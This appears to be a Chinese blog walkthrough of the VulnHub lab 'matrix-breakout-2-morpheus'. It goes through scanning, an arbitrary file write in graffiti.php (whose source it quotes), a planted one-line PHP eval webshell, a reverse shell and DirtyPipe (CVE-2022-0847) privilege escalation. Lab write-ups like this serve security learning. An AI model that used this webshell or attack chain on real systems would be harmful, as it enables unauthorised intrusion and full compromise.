matrix-breakout-2-morpheus vulnhub靶场-个人在线分享

端口扫描
matrix-breakout-2-morpheus vulnhub靶场插图
80

81

需要用户名密码登录
matrix-breakout-2-morpheus vulnhub靶场插图(2)
目录扫描

robots.txt

妹用
matrix-breakout-2-morpheus vulnhub靶场插图(4)
找不到利用点，换个扫描器再扫

发现新的文件
matrix-breakout-2-morpheus vulnhub靶场插图(5)
graffiti.txt

graffiti.php
matrix-breakout-2-morpheus vulnhub靶场插图(7)
输入的数据Post后会回显到页面上

抓包看看，居然直接传文件路径

发现我们post的数据被写入了graffiti.txt文件

这里有可能存在文件任意读取漏洞，尝试修改file的值
matrix-breakout-2-morpheus vulnhub靶场插图(10)
发现可以读取graffiti.php文件

查看php内容

file默认值为graffifi.txt，接收file，message两个post参数

若存在message参数，则打开file文件并写入

<br>
$file="graffiti.txt";
<br>
if($_SERVER['REQUEST_METHOD'] == 'POST') {
<br>
    if (isset($_POST['file'])) {
<br>
       $file=$_POST['file'];
<br>
    }
<br>
    if (isset($_POST['message'])) {
<br>
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
<br>
        fwrite($handle, $_POST['message']);
<br>
	fwrite($handle, "
");
<br>
        fclose($file); 
<br>
    }
<br>
}
<br>

<br>
// Display file
<br>
$handle = fopen($file,"r");
<br>
while (!feof($handle)) {
<br>
  echo fgets($handle);
<br>
  echo "

";
<br>
}
<br>
fclose($handle);

可以看出来通过修改file的值，可以实现文件任意写入

直接修改file为graffiti.php，message传入一句话木马，蚁剑连接

<?php @eval($_POST['cc']);?>

matrix-breakout-2-morpheus vulnhub靶场插图(12)

反弹shell

半交互回显

python3 -c 'import pty; pty.spawn("/bin/bash")'

翻找文件时发现的
matrix-breakout-2-morpheus vulnhub靶场插图(15)
提权
上传linpeas.sh
好几个cve漏洞

从年份近的开始试起

CVE-2022-0847 DirtyPipe

添加链接描述

执行权限好像不够，直接加777
提权成功
matrix-breakout-2-morpheus vulnhub靶场插图(17)

一	二	三	四	五	六	日
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30

admin 钻石

相关推荐